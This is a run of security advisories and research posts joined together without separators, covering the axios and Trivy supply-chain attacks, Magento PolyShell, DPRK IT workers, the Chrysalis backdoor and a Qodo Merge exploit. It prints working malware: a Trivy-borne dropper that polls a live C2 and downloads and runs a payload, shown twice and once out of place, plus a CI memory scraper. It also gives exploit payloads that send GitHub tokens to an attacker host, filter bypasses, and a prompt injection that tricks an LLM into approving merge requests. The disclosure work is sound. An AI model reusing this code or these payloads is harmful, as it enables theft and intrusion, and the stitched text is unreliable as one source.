
On March 31, 2026, StepSecurity identified a sophisticated supply chain attack involving the compromise of two versions of the popular axios HTTP client library on npm: [email protected] and [email protected]. These versions were published using compromised npm credentials of a lead axios maintainer, bypassing the usual CI/CD pipeline. The attack involved injecting a malicious dependency, [email protected], which executed a postinstall script deploying a cross-platform remote access trojan (RAT). This RAT targeted macOS, Windows, and Linux systems, establishing a connection with a command-and-control server to deliver platform-specific payloads.
The Safe Version Reference is: [email protected] (safe) · shasum: 7c29f4cf2ea91ef05018d5aa5399bf23ed3120eb
Immediate Actions: - Downgrade to safe axios versions: [email protected] or [email protected]. - Remove plain-crypto-js from node_modules and reinstall dependencies with npm install --ignore-scripts. - Check for RAT artifacts on affected systems and treat them as fully compromised if found.
Preventive Measures: - Use --ignore-scripts in CI/CD pipelines to prevent postinstall hooks from executing. - Block C2 traffic at the network/DNS layer. - Rotate all credentials on systems where the malicious package ran.
For StepSecurity Enterprise Customers: - Utilize Harden-Runner to enforce network egress allowlists and detect anomalous network traffic. - Deploy StepSecurity Dev Machine Guard for real-time visibility into npm packages installed on developer devices.
The CFC is monitoring the situation and analyzing the case to launch potential threat-hunting campaigns. This advisory will be updated if required.
In March 2026, the TeamPCP threat actor compromised the open-source vulnerability scanner Trivy and distributed credential-stealing payloads through its official distribution channels. We investigated two separate clients affected by two distinct variants of this campaign: one through the compromised GitHub Action (trivy-action), the other through the compromised container image binary itself. Each variant operates differently, carries different capabilities, and requires a different investigative approach.
This post walks through both investigations: how we reverse-engineered each payload, what we found in the cloud audit trail following AWS secrets theft, and what the binary variant reveals about the attacker's ambitions beyond CI/CD credential theft. For the technical details of the supply-chain compromise mechanics, we refer the reader to CrowdStrike, Wiz, Rami McCarthy, and Microsoft.
On March 19, 2026, threat actor TeamPCP compromised the aquasecurity/trivy-action GitHub Action and the Trivy container image (v0.69.4), distributing credential-harvesting payloads through Docker Hub, ECR, and GHCR. The campaign later expanded to npm packages (28 infected via a self-propagating worm), Checkmarx KICS GitHub Actions, OpenVSX extensions, and the LiteLLM PyPI package. This was a sustained, multi-ecosystem supply-chain operation spanning nearly a month.
The malicious commit to trivy-action is still publicly accessible on GitHub. It injects malicious code into entrypoint.sh that execute before the legitimate Trivy scan. The payload operates in three stages:
Stage 1 reads /proc/PID/environ for the current process and any running Runner.Worker, Runner.Listener, runsvc, or run.sh processes. It captures environment variables matching env or ssh in the key name, and if a value points to a file on disk, reads that file too.
Stage 2 forks based on RUNNER_ENVIRONMENT. On GitHub-hosted runners, it scrapes the Runner.Worker process memory for JSON secrets structures. On self-hosted or GitLab runners, it executes a base64-encoded Python filesystem harvester signed "TeamPCP Cloud stealer" that reads SSH keys, cloud credentials, Kubernetes configs, Docker credentials, .env files, terraform state, shell history, database configs, TLS private keys, and cryptocurrency wallets, walking multiple directories up to 6 levels deep, matching over 100 file paths.
Stage 3 encrypts the collected data with AES-256-CBC (random session key wrapped with a hardcoded 4096-bit RSA public key), bundles it as tpcp.tar.gz, and POSTs to scan.aquasecurtiy[.]org. If the POST fails and a GitHub PAT is available, it creates a public repository named tpcp-docs and uploads the bundle as a release asset.
When a credential stealer runs in your CI/CD pipeline, the natural reaction is to assume everything is compromised. That creates noise without clarity. Instead, we wanted to know precisely what the attacker received.
We replicated every check from the malicious payload (identical paths, glob patterns, recursive walk depths, and match functions) in an audit script, then ran it on a container configured to match the client's production GitLab runner environment.
.webp)
The simulation confirmed the exact set of exfiltrated credentials: two distinct AWS key pairs with broad permissions, several CI/CD service tokens, and the full printenv output with all secrets in cleartext. Just as importantly, it confirmed what was not exposed: no SSH keys, no cloud credential files on disk, no Docker registry configs, and ephemeral containers with no persistent backdoor risk.
This gave us a definitive inventory to trace through CloudTrail. No guesswork, no FOMO-driven mass rotation.
We performed an exhaustive CloudTrail search across all 29 AWS regions on both compromised keys from four distinct source IPs.
The first IP to touch the stolen keys ran TruffleHog to validate that the credentials were live. The TruffleHog user agent appears directly in CloudTrail. The attacker then enumerated IAM users, roles, Lambda functions, DynamoDB tables, CloudFormation stacks, and scanned every S3 bucket's ACL and public access configuration. Services outside the compromised policy (EC2, RDS, SecretsManager) returned AccessDenied.
The attacker scanned 24 S3 buckets, including 9 terraform state buckets. The organization's CloudTrail was configured for management events only. S3 data events (GetObject, PutObject) were not enabled. We could see the attacker map every bucket and check every ACL, but not whether they downloaded anything.
With s3:* permissions and no data event logging, we assessed that the contents of all 24 scanned buckets should be treated as compromised.
We ran TruffleHog against all 24 buckets and found 5 RSA private keys in cleartext in one bucket used for JWT signing. TruffleHog is pattern-based though: it catches known secret formats but misses database passwords and API keys stored as plain values in terraform state files.
With iam:* permissions, the attacker could have created backdoor users, roles, or access keys that would survive key rotation. We pulled full IAM state dumps from both accounts. No backdoor users, roles, or keys were created. No policies modified. No trust relationships changed. The attacker stuck to reconnaissance.
The second infection was not detected by an alert. The client's EDR had full telemetry of the compromised binary's execution, including the characteristic pgrep -f Runner.Worker child processes, but did not flag the malicious ELF file at the time it ran.
We identified the infection through proactive hunting. When the TeamPCP campaign IOCs were published, we matched the compromised Trivy v0.69.4 binary hash (822dd269ec10459572dfaaefe163dae693c344249a0161953f0d5cdd110bd2a0) against our clients' container image inventories and found a hit. The client had been running aquasec/trivy:latest with Watchtower auto-update enabled. When TeamPCP pushed the compromised image to Docker Hub, Watchtower pulled and deployed it automatically.
import urllib.request
import os
import subprocess
import time
C_URL = "https://tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io/"
TARGET = "/tmp/pglog"
STATE = "/tmp/.pg_state"
def g():
try:
req = urllib.request.Request(C_URL, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=10) as r:
link = r.read().decode('utf-8').strip()
return link if link.startswith("http") else None
except:
return None
def e(l):
try:
urllib.request.urlretrieve(l, TARGET)
os.chmod(TARGET, 0o755)
subprocess.Popen([TARGET], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, start_new_session=True)
with open(STATE, "w") as f:
f.write(l)
except:
pass
if __name__ == "__main__":
time.sleep(300)
while True:
l = g()
prev = ""
if os.path.exists(STATE):
try:
with open(STATE, "r") as f:
prev = f.read().strip()
except:
pass
if l and l != prev and "youtube.com" not in l:
e(l)
time.sleep(3000)Unlike the Action variant (a shell script injected into entrypoint.sh), the binary variant compiles the malicious code directly into the Trivy Go binary. Aqua Security cleaned the repository and deleted the v0.69.4 tag. The malicious Go source files (scand.go, fork_unix.go) are no longer accessible on GitHub. But the compiled binary preserves everything.
Using strings extraction on the 153MB stripped ELF binary, we confirmed the malicious infrastructure compiled into the binary: the C2 URL (scan.aquasecurtiy[.]org), the GitHub fallback exfil pattern (tpcp-docs repository creation + release upload), the credential sweep file paths, and the persistence artifacts.
We also extracted two base64-encoded Python payloads embedded in the Go binary:
Payload 1: Memory scraper. Identical to the Action variant's GitHub-hosted runner path. Targets the Runner.Worker process via /proc/PID/mem, pattern-matching for {"value":"<secret>","isSecret":true}.
import sys
import os
import re
def get_pid():
for pid in (p for p in os.listdir('/proc') if p.isdigit()):
try:
with open(os.path.join('/proc',pid,'cmdline'),'rb') as f:
if b'Runner.Worker' in f.read():return pid
except OSError:continue
raise SystemExit(0)
pid=get_pid()
map_path=f"/proc/{pid}/maps"
mem_path=f"/proc/{pid}/mem"
with open(map_path,'r') as map_f,open(mem_path,'rb',0) as mem_f:
for line in map_f:
m=re.match(r'([0-9A-Fa-f]+)-([0-9A-Fa-f]+) ([-r])',line)
if not m or m.group(3)!='r':continue
start=int(m.group(1),16);end=int(m.group(2),16)
if start>sys.maxsize:continue
mem_f.seek(start)
try:
chunk=mem_f.read(end-start);sys.stdout.buffer.write(chunk)
except OSError:continuePayload 2: The sysmon.py persistence dropper. This is what sets the binary variant apart:
import urllib.request
import os
import subprocess
import time
C_URL = "https://tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io/"
TARGET = "/tmp/pglog"
STATE = "/tmp/.pg_state"
def g():
try:
req = urllib.request.Request(C_URL, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=10) as r:
link = r.read().decode('utf-8').strip()
return link if link.startswith("http") else None
except:
return None
def e(l):
try:
urllib.request.urlretrieve(l, TARGET)
os.chmod(TARGET, 0o755)
subprocess.Popen([TARGET], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, start_new_session=True)
with open(STATE, "w") as f:
f.write(l)
except:
pass
if __name__ == "__main__":
time.sleep(300)
while True:
l = g()
prev = ""
if os.path.exists(STATE):
try:
with open(STATE, "r") as f:
prev = f.read().strip()
except:
pass
if l and l != prev and "youtube.com" not in l:
e(l)
time.sleep(3000)
The binary checks the GITHUB_ACTIONS environment variable. If absent (meaning it's running on a developer machine or standalone server, not in CI), it writes this Python script to ~/.config/systemd/user/sysmon.py and creates a systemd unit for persistence. The dropper sleeps 5 minutes, then polls the ICP blockchain-hosted C2 for a second-stage payload URL, downloads it to /tmp/pglog, and executes it.
This is a significant escalation over the Action variant. The Action is fire-and-forget: it runs once during a CI pipeline and exfiltrates what it finds. The binary adds a persistent backdoor that survives reboots and maintains ongoing access through a takedown-resistant C2 hosted on the Internet Computer Protocol.
Three of the four IPs are VPN exit nodes on Datacamp Limited (AS212238, Sweden and Croatia) and Host Universal (AS136557, New Zealand). Disposable anonymization infrastructure with no prior reputation in any threat intelligence feed.
The outlier is 209.159.147.239, an Interserver VPS in New York, the only one of the four with open services. It runs:
nsa[.]catThe TLS certificate on port 443 revealed the domain. The certificate's Common Name is nsa[.]cat, linking the IP to the domain. Pivoting on the domain:
209.159.147.239This is the attacker's operational server. They used it to run TruffleHog against stolen AWS keys (confirmed by the TruffleHog user agent in CloudTrail pointing to this IP). It hosts MinIO, a natural place to stage stolen credential bundles before processing. The 401 on nginx indicates a gated panel or API for managing operations. The other three IPs are throwaway VPN exits; this one is infrastructure the attacker owns and operates.
During continued monitoring of this VPS, we found a Python HTTP server running on port 888 serving an open directory with two files:
bomgar.txt (900K lines): a list of domains containing substrings like access, remote, rdweb, gateway, and secure-access. "Bomgar" is the former name of BeyondTrust Remote Support. This is a target list: domains with exposed BeyondTrust remote access endpoints. This is notable given the recent CVE-2026-1731, a pre-authentication remote code execution vulnerability in BeyondTrust Remote Support.raw_domains.txt (6.6 million lines): a massive domain list, likely scraped from Certificate Transparency logs or passive DNS datasets, used as input for the Bomgar scan.This server looks like not just a credential staging point. The attacker is also using it to build target lists for exploiting remote access infrastructure.
iam:*, s3:*, lambda:*, and 6 other full-service permissions on Resource: *. The attacker enumerated IAM users, Lambda functions, DynamoDB tables, CloudFormation stacks, and scanned every S3 bucket across production and non-production. A scoped policy, only the specific permissions the pipeline actually needs on the specific resources it touches, would have reduced the blast radius from full cloud enumeration to a single service.image: aquasec/trivy@sha256:... instead of image: aquasec/trivy:latest. Tags can be force-pushed to point to a different image; digests cannot. Combined with Watchtower or similar auto-update tools, a :latest tag becomes an auto-deploy mechanism for supply-chain attacks.latest tags auto-deployed the compromised image without human review. Auto-update is convenient in development; in production, it's an uncontrolled deployment pipeline.
PolyShell is a critical vulnerability affecting Magento Open Source 2 and Adobe Commerce platforms. It targets the REST API responsible for file uploads in custom product options within the shopping cart. The vulnerability is actively exploited in the wild, with attacks beginning shortly after public disclosure. Successful exploitation may result in:
Due to the nature of e-commerce systems handling sensitive customer and payment data, this vulnerability presents a high to critical risk to affected organizations.
The PolyShell vulnerability affects Magento Open Source 2 and Adobe Commerce instances that have not yet applied the official patch addressing unrestricted file uploads in custom product options via the REST API.
Specifically affected systems include:
Key considerations:
The vulnerability originates from improper handling of file uploads via the Magento REST API in the context of custom product options. Attackers can exploit this by uploading polyglot files—files crafted to be interpreted differently by various components (e.g., application logic, web server, validation layers). If validation mechanisms are insufficient, this can lead to:
Observed attack techniques include:
These techniques reduce visibility for traditional security monitoring tools and increase attacker dwell time.
Organizations should treat this vulnerability as a priority and implement both remediation and detection measures immediately:
pub/media/custom_options/ directoryEnforce strict validation of:
Ensure secure file storage and handling on the server side.
Scan for:
Monitor outbound traffic, especially:
Use indicators of compromise (IoCs) and IP addresses reported in references for detection.
Prepare and execute an incident response plan including:
The CFC is monitoring the situation and this advisory will be updated if required, or when more information becomes available.
A recent supply chain incident involving Trivy resulted in the distribution of a malicious release v0.69.4 after attackers compromised the project’s release process via GitHub. The attacker manipulated Git tags to point to unauthorized code, effectively bypassing normal trust assumptions tied to versioned releases. This event follows an earlier Trivy-related security issue but represents a distinct and more targeted attack on release integrity, where users consuming tagged versions were exposed to tampered artifacts. It is important to note that this has been reported as being actively exploited.
- GitHub releases without signature validation
The attackers exploited control over the repository’s release process, specifically the ability to manipulate Git tags and associated release artifacts. By reassigning the trusted version identifier v0.69.4 to malicious code, they were able to bypass traditional trust mechanisms that rely on semantic versioning and tagged releases. This allowed the malicious version to appear legitimate to both users and automated systems without requiring changes to the visible development workflow or source code review process.
After obtaining sufficient access to the repository, the attacker modified the Git tagging structure to introduce or overwrite the v0.69.4 tag, pointing it to a malicious commit outside the expected code lineage. This effectively weaponized the tag itself, transforming it into a delivery mechanism for attacker-controlled code while retaining the appearance of a valid release.
With the tag in place, the attacker ensured that a corresponding GitHub release was available and associated with the compromised tag. This release contained malicious binaries that, when executed, performed unauthorized data exfiltration activities. Specifically, the binaries attempted to collect sensitive information from the execution environment, including environment variables, configuration data, and authentication tokens, and transmit this data to attacker-controlled infrastructure.
The malicious binaries are particularly dangerous in CI/CD environments, where Trivy is commonly executed with access to:
Upon execution, the payload leveraged this access to extract available sensitive data and initiate outbound network connections to exfiltrate it. Because these actions occurred within legitimate pipeline executions, they could blend in with normal network activity and evade immediate detection.
The success of the attack relied heavily on downstream automation. CI/CD pipelines and developer workflows that referenced v0.69.4, either through GitHub Actions (uses: aquasecurity/[email protected]) or direct Git operations, automatically retrieved and executed the compromised version. This meant the attacker did not need to directly target individual systems; instead, they leveraged existing update mechanisms to propagate the malicious code broadly and efficiently.
Once executed, the compromised Trivy binary operated within highly trusted contexts such as build pipelines and security scanning processes. In these environments, the tool often has broad access to sensitive data, significantly increasing the potential impact of the exfiltration behavior.
If v0.69.4 was used in any capacity:
The CFC is monitoring the situation and this advisory will be updated if required, or when more information is made available.
https://www.stepsecurity.io/blog/trivy-compromised-a-second-time---malicious-v0-69-4-release
https://socket.dev/blog/trivy-under-attack-again-github-actions-compromise
After our article about the internal infrastructure of theDPRK fake IT workers, we wanted to document a network that we believe that it’s used for their offensive operations as a lab for various purposes that we can’t give because at this time we don’t know what their main mission within this infrastructure part are. Over the time they gained maturity and learned how structure and industrialize their offensive operations.
During our research we could assess with moderate confidence these four distinct networks. (see Annex A)

This specific infrastructure is not like the previously assessed one, due to the number of services that each machine serves which is greater than that on other networks and due to the presence of MOBSF which is used as an offensive security tool. It seems that they have machines with more allowed resources.By using the identified servers, we can’t reconstitute their development workflow and what they are doing inside of these networks. Even with low confidence, because as we don’t have a clear view of what is the objective here, it could be either a testing infrastructure or a pre-production environment. Based on the threat actors activity, we can say that it is likely related to an offensive environment.
During our research on the external infrastructure, we saw that many public IP addresses belonging to AstillVPN, VPS providers or residential proxies overlap with hacking campaigns led by North Korean actors. Even when these public IP addresses are related to North Korean IT workers because they sometimes share the same infrastructure and exit nodes, as multiple cells seem to converge into the 192.168.91.0/24 network range. This allows them to avoid being flagged while applying for job offers or compromising companies. To bypass country-based detection, they mainly chose VPS servers hosted in Europe or in North America.
Infiltrating companies can be considered as an initial access technique that can lead to prepositioning techniques for espionage or disruptive operations. During our ongoing research, we observed that they attempted to apply for OT related positions, roles within the Energy sector, and also placed specific markers in the Aeronautics sector and defense sectors mostly in the US and across EU countries.
Following the previous article about their infrastructure we wanted to retrieve more network linked to the fake IT workers, so we took the most used IP internally as mentioned on the chats from “IPmsg”.

Since we know that they all had to register on this server,we were able to pivot to other public IPs that have not yet been flagged as belongingto Fake IT workers by using the “domain” field within Hudsonrock which can bealso used for private IPs.

Hudsonrock (for the stealer logs)
https://lazarus.day/search/?q=npm
https://www.recordedfuture.com/research/purplebravos-targeting-it-software-supply-chain
https://www.sentinelone.com/labs/contagious-interview-threat-actors-scout-cyber-intel-platforms-reveal-plans-and-ops/
Here you will find an array with the infrastructure elements identified within this group of networks.
Following the first article on the DPRK fake IT workers infrastructure, we wanted to write a separate article about the cybercrime ecosystem, which is unique in that it combines a persistent conglomerate of companies with a large number of North Korean workers. In this article, we will present the methodologies used in our research on this subject.
As we saw in our research, North Korean IT workers use their own terms to describe the elements of the infrastructure shown below.

Mainly for the remote services part, we could observe a cluster of developers in Iran, Syria, and South Africa who are regular citizen that accepted to be hired following a proposal on LinkedIn by North Korean IT workers, followed by a change of application to discuss on WhatsApp with the newly hired person. LinkedIn is widely used as a first approach for new hires and to initiate first contact within the targeted countries, which vary depending on the job offer.
The technique of the first approach may vary depending on the North Korean IT worker; they don’t have a defined process and seem free to use their own methods.
Figure 2: Table and definition of each role within the cybercrime structure
For the local employees who appear to be mainly within the US, they are targeted on LinkedIn, likely in specific position as we could see most of the targeted “Local person” or “supporter” are drivers, plumbers, freelancers, and probably more jobs. The tariffication to obtain a fake identity is 250 US dollars prepaid, and “local persons” can introduce their friends as well to give their identity to DPRK IT workers.
As we could see, DPRKIT workers use data brokers to obtain fake identities, which is an important step toward mastering the verification bypass on job offer websites, social medias and background checks during the interview process. The DPRK IT worker is the only one who manipulates the .PSD files and applies modifications to them.

With these .PSD files, we observed that the developers acknowledged using fake identities to swap identities between interviews with their consent.

During our investigation into stealer logs, we observed that DPRK IT workers had developer-level access to the U.S.-sanctioned hosting service ‘Funnull’. As we can see, they maintained the infrastructure and performed fixes on “Goedge CDN,” an open-source solution for building their own CDN and WAF.
As we could see during our analysis, we assessed that DPRK IT workers are using similar techniques as Blackbasta to do cash out, but this time with Tron to USDT(Tether) to do cash out on a wallet named “company” or maintain their infrastructure.

It seems they put a lot of effort into reducing and optimizing energy consumption; for that, we found traces of automated transfers via Tron (TRX).We could see on the stealer log this specific process

Hudsonrock (for the stealer logs)
https://home.treasury.gov/news/press-releases/sb0149
Chrysalis is a sophisticated backdoor used in a targeted cyber‑espionage campaign attributed with moderate confidence to the threat group commonly tracked as Lotus Blossom. The malware was delivered through a compromised software distribution channel, representing a likely supply‑chain attack. Chrysalis is designed for long‑term persistence and remote access, providing operators with full control over infected systems, including command execution, file manipulation, and interactive shell access. The campaign demonstrates high operational maturity through multi‑stage loaders, heavy obfuscation, and stealthy command‑and‑control communications.
Chrysalis is deployed through a multi‑stage infection chain. Initial execution occurs via a trojanized installer that drops multiple components to disk. A legitimate, renamed executable is abused to sideload a malicious DLL, which acts as a loader for the core backdoor.
The loader decrypts and executes shellcode in memory using custom routines and reflective loading techniques. Windows APIs are resolved dynamically using hashing, significantly complicating static detection and reverse engineering.
Once loaded, the Chrysalis backdoor establishes encrypted command‑and‑control communications over HTTPS using a generic browser user‑agent string to blend into normal network traffic. Configuration data, including C2 endpoints, is encrypted within the binary.
The backdoor supports a broad set of capabilities:
Persistence is achieved through either Windows service creation or registry‑based autorun mechanisms. In observed cases, the initial compromise also enabled delivery of additional payloads, including post‑exploitation frameworks, indicating use as an access broker or long‑term foothold.
Additionally, note that the attacker access to the internal Notepad++ servers was fully terminated on December 2nd, 2025.
The CFC is monitoring the situation and analyzing the case to identify potential threat‑hunting campaigns. This advisory will be updated if required. Clients subscribed to our vulnerability scan services will receive relevant results if critical vulnerabilities are found within the scope of the scans as soon as a relevant plugin is made available by the scan provider.
In this blog post, we explain how we leaked Qodo Merge Pro's AWS secret key that had Administrator permissions and how we obtained Remote Code Execution on their GitHub app production server. A malicious attacker could have taken over their AWS infrastructure and with the attack on the GitHub app, gained write access to their customers' repositories for a massive supply chain attack.
This is a technical write-up of some of the vulnerabilities we disclosed at Black Hat USA last summer. It is part of a series of blog posts about security vulnerabilities we found in AI developer tools. This post also describes previously unreleased vulnerabilities. This is published for awareness purposes in the hopes that others can avoid similar vulnerabilities. Secondarily, we want to show how just knowing about prompt injection isn't enough. There needs to be a solid understanding of the environment, features, and systems involved to identify the risks in AI-powered applications. Otherwise, devastating impacts may go unidentified.
Note: All the vulnerabilities described in this blog post have been fixed as of October 2025.
Kudos to Qodo for quickly remediating these issues after reception of our responsible disclosure.
Since this blog post is a follow-up to events that took place last year, let's go through a quick recap.
In August 2024, I wrote about 2 vulnerabilities I found in Qodo Merge, an open-source AI code review tool. At the time this was published, the vulnerabilities were still exploitable. A few months later, I also gave a talk at 38C3 about those vulnerabilities. Then, I moved on to research vulnerabilities in other AI developer tools.
A few weeks later, after I wrapped up the research on CodeRabbit, I noticed that Qodo had pushed a fix to the exploit I disclosed at 38C3 and decided to look into it.
As a reminder, let's quickly detail what those 2 vulnerabilities were.
1) Our first Qodo Merge exploit allowed us to leak a GitHub access token used in a Qodo Merge GitHub Action. This token had write permissions to the repository so it could have been used to modify GitHub repositories that were using Qodo Merge as a GitHub Action with the default settings. That includes manipulating the git history, updating existing GitHub releases and performing lateral moves leading to potential leakage of GitHub repository secrets in certain cases.
The exploit was injected through a GitHub Pull Request (PR) comment. For example: the following comment could be posted on a PR to leak the GitHub access token to our attacker-controlled server at 1.2.3.4:

2) Our second exploit allowed for a privilege escalation on Gitlab quick-actions through a prompt injection. This affected people specifically using Qodo Merge on Gitlab projects. Indeed, we could trick an LLM into outputting a Gitlab quick-action such as "/approve" that would be posted by Qodo Merge on a Gitlab Merge Request (MR) comment. Gitlab would then execute the quick-action and, for example, approve a merge request with potentially more permissions than the user had. A malicious actor with low permissions could exploit this vulnerability to elevate their permissions and execute Gitlab quick actions with those elevated permissions (the ones of Qodo Merge). The image below explains this in more detail.

Now that the recap is done, let's continue with our story.
As mentioned earlier, Qodo pushed fixes to both exploits. We'll focus on the first one here, since this is the most interesting one. They added a list of forbidden arguments that couldn't appear in GitHub comments. Here is a list of the forbidden arguments introduced in that fix:
Since .base_url is now forbidden, this indeed blocks our original exploit because it contains .base_url:
/ask What does this do? --github.base_url=http://1.2.3.4However, this didn't fix the root issue. Let's see how this can be bypassed.
Qodo Merge uses a Python library called Dynaconf to handle its internal configuration. This is a convenient library for managing the configuration of an application because it's easy to use and it has useful features such as reading a set of key/value pairs from a configuration file.

Indeed, one can normally get and set key/value pairs on a Dynaconf object:
from dynaconf import Dynaconf
settings = Dynaconf()
key = "foobar"
value = 42
settings.set(key, value)
print(settings.get("foobar") == 42) # prints TrueAlternatively, the Dynaconf object can be built and populated with key/value pairs stored in a configuration file. This configuration file can be written in various formats supported by Dynaconf and one of them is TOML. This is the config file format that Qodo Merge uses.
For example, a configuration file named configuration.toml can have the following contents:
[some_table]
foo = "bar"
name = "John"
age = 42And a Dynaconf object that contains the key/values stored in the above configuration file can be created:
from dynaconf import Dynaconf
settings = Dynaconf(
settings_files=["configuration.toml"],
)
foo = settings.get("some_table.foo")
name = settings.get("some_table.name")
age = settings.get("some_table.age")
print(foo == "bar") # prints True
print(name == "John") # prints True
print(age == 42) # prints TrueNow that we're more familiar with Dynaconf, let's get back to Qodo Merge. Whenever a GitHub comment contains --key=value, Qodo Merge will set key to value in its internal Dynaconf object. So, in our exploit above, the following will be executed by Qodo Merge on its internal Dynaconf settings object:
settings.set("github.base_url", "http://1.2.3.4")But the fix that introduces forbidden arguments blocks this specific exploit.
However, it turns out that Dynaconf has advanced features that allow for unexpected behavior by default. Indeed, in addition to managing key-value pairs, Dynaconf will perform special transformations to a value when a key/value pair is inserted/modified, if the value contains specific syntax named Dynamic Variables.
For example, Dynaconf will convert JSON strings to a dict if it's prefixed with @json:
value = '@json {"foo": "bar"}'
settings.set("key", value)
print(settings.get("key") == dict(foo="bar"))
# prints "True"It will also evaluate Jinja expressions prefixed with @jinja:
value = "@jinja {{ 2 + 2 }}"
settings.set("key", value)
print(settings.get("key") == "4")
# prints "True"These features can be combined:
value = '@json @jinja { "two_plus_two": "{{ 2 + 2 }}" }'
settings.set("key", value)
print(settings.get("key") == dict(two_plus_two="4"))
# prints "True"Leveraging those Dynaconf features, we can rewrite our exploit so that it achieves the same goal as before, but without containing any of the forbidden arguments.
So, we go from this:
/ask who are you? --github.base_url=http://1.2.3.4To this:
/ask who are you? "--github=@json @jinja {{\"{{\"[0]}}\"user_token\":\"
{{this.GITHUB_TOKEN}}\",\"BASE_URL\":\"http://1.2.3.4\"{{\"}}\"[0]}}"
"--github.user_token=@jinja {{this.GITHUB_TOKEN}}"We reported this to Qodo and they pushed another fix which added .user to the list of forbidden arguments. Fixing security issues can be hard.
Indeed, this new fix blocked our bypass to the first fix, but it still didn't fix the root issue.
So, we wrote another exploit that achieved the same goal but without containing .base_url nor .user. This time we used another trick. We used a Jinja expression to modify the Dynaconf object directly using __setattr__().
We went from this:
/ask who are you? "--github=@json @jinja {{\"{{\"[0]}}\"user_token\":\"
{{this.GITHUB_TOKEN}}\",\"BASE_URL\":\"http://1.2.3.4\"{{\"}}\"[0]}}"
"--github.user_token=@jinja {{this.GITHUB_TOKEN}}"To this:
/ask who are you? "--github=@json @jinja {{\"{{\"[0]}}\"user_token\":\"
{{this.GITHUB_TOKEN}}\",\"BASE_URL\":\"http://1.2.3.4\"{{\"}}\"[0]}}"
"--github.foo=42"
"--github.foo=@jinja {{this.github.__setattr__(\"user_token\", this.GITHUB_TOKEN)}}"And the exploit still worked because it didn't contain any of the forbidden arguments. This cat and mouse game could have continued forever at this rate.
We reported this to Qodo and moved on. A few days later, I noticed that Qodo had a SaaS version of this tool called Qodo Merge Pro so I decided to have a look at it too.
While Qodo Merge is open source, Qodo Merge Pro is the SaaS version that comes as a GitHub app.
At the time I'm writing this, Qodo Merge Pro has over 15,000 installs. Upon installation, the user is asked to select on which repositories they would like to install Qodo Merge Pro. When doing this, the user grants Qodo read and write access to the selected repositories. The exact set of granted permissions is the following:
"permissions": {
"actions": "read",
"checks": "read",
"contents": "write",
"discussions": "write",
"issues": "write",
"metadata": "read",
"pull_requests": "write"
},Qodo Merge and Qodo Merge Pro have a feature that lets a user dump non-sensitive key/value pairs stored in the Dynaconf object. This can be achieved by writing /config in a comment. The app replies with a comment containing the key/value pairs.

Qodo Merge dumps the whole config object but takes care of removing any secrets, such as anything loaded from the .secrets.toml file, where Qodo Merge secrets are typically located, or specific keys such as LLM provider API keys for example. Here's a code snippet from Qodo Merge's code where the Dynaconf object to be dumped with /config is built:
def _prepare_pr_configs(self) -> str:
conf_file = get_settings().find_file("configuration.toml")
conf_settings = Dynaconf(settings_files=[conf_file])
configuration_headers = [header.lower() for header in conf_settings.keys()]
relevant_configs = {
header: configs for header, configs in get_settings().to_dict().items()
if (header.lower().startswith("pr_") or header.lower().startswith("config")) and header.lower() in configuration_headers
}
skip_keys = ['ai_disclaimer', 'ai_disclaimer_title', 'ANALYTICS_FOLDER', 'secret_provider', "skip_keys", "app_id", "redirect",
'trial_prefix_message', 'no_eligible_message', 'identity_provider', 'ALLOWED_REPOS',
'APP_NAME', 'PERSONAL_ACCESS_TOKEN', 'shared_secret', 'key', 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'user_token',
'private_key', 'private_key_id', 'client_id', 'client_secret', 'token', 'bearer_token', 'jira_api_token','webhook_secret']
partial_skip_keys = ['key', 'secret', 'token', 'private']
extra_skip_keys = get_settings().config.get('config.skip_keys', [])
if extra_skip_keys:
skip_keys.extend(extra_skip_keys)
skip_keys_lower = [key.lower() for key in skip_keys]Therefore we shouldn't find any secrets in the key/value pairs that are dumped. And so far, this was true. However, there was another way.
Qodo Merge Pro, just like Qodo Merge, allows users to place a configuration file at the root of the repository to overwrite some settings. Now, what if we overwrite some key/value pairs and combine that with Dynaconf special features? Now we're talking!
We placed a .pr_agent.toml file at the root of the repository with the following contents:
[pr_update_changelog]
extra_instructions="@format pwned: ```{env}```"What this does, is the same as running this code:
settings.set("pr_update_changelog.extra_instructions", "@format pwned: ```{env}```")The @format Dynaconf dynamic variable will be evaluated and {env} will be replaced with all the environment variables of the running process.
Next, we simply asked Qodo Merge Pro to dump its config again with /config and this is what we found:

All the environment variables were there on a very long single line. Here are the relevant pieces in a more readable format. Some irrelevant variables were omitted for brevity:
==================== PR_UPDATE_CHANGELOG ====================
pr_update_changelog.push_changelog_changes = False
pr_update_changelog.extra_instructions = "pwned: ```environ({
'CONFIG.APP_NAME': 'pr-agent-pro-github',
'CONFIG.ALLOWED_REPOS': '(CENSORED)',
'CONFIG.ANALYTICS_FOLDER': '/logs',
'PROMETHEUS_MULTIPROC_DIR': '/app/prometheus_metrics',
'PYTHON_SHA256': '24887b92e2afd4a2ac602419ad4b596372f67ac9b077190f459aba390faf5550',
'_': '/usr/local/bin/gunicorn',
'SERVER_SOFTWARE': 'gunicorn/22.0.0',
'TIKTOKEN_CACHE_DIR': '/usr/local/lib/python3.12/site-packages/litellm/litellm_core_utils/tokenizers',
'AWS_ACCESS_KEY_ID': 'AKI(CENSORED)',
'AWS_SECRET_ACCESS_KEY': '/l33t(CENSORED)',
'AWS_REGION_NAME': '(CENSORED)'
})```"
pr_update_changelog.add_pr_link = TrueThose environment variables notably contained an AWS secret key. But this was not a regular AWS secret key. It was a very l33t AWS secret key. Not just because its value started with /l33t but because of its permissions. Can you guess what permissions it had? Of course, AdministratorAccess :) Let's see how we can obtain this information.
Let's see how permissions can be listed with the AWS CLI tool. First we configure the CLI tool to use the leaked AWS Secret Key:
$ aws configure
AWS Access Key ID [None]: AKI(CENSORED)
AWS Secret Access Key [None]: /l33t(CENSORED)
Default region name [None]: (CENSORED)
Default output format [None]:Next, we check the user identity associated with this AWS secret key:
$ aws iam get-user
{
"User": {
"Path": "/",
"UserName": "Administrator",
"UserId": "(CENSORED)",
"Arn": "arn:aws:iam::(CENSORED):user/Administrator",
"CreateDate": "2022-08-07T12:54:51Z",
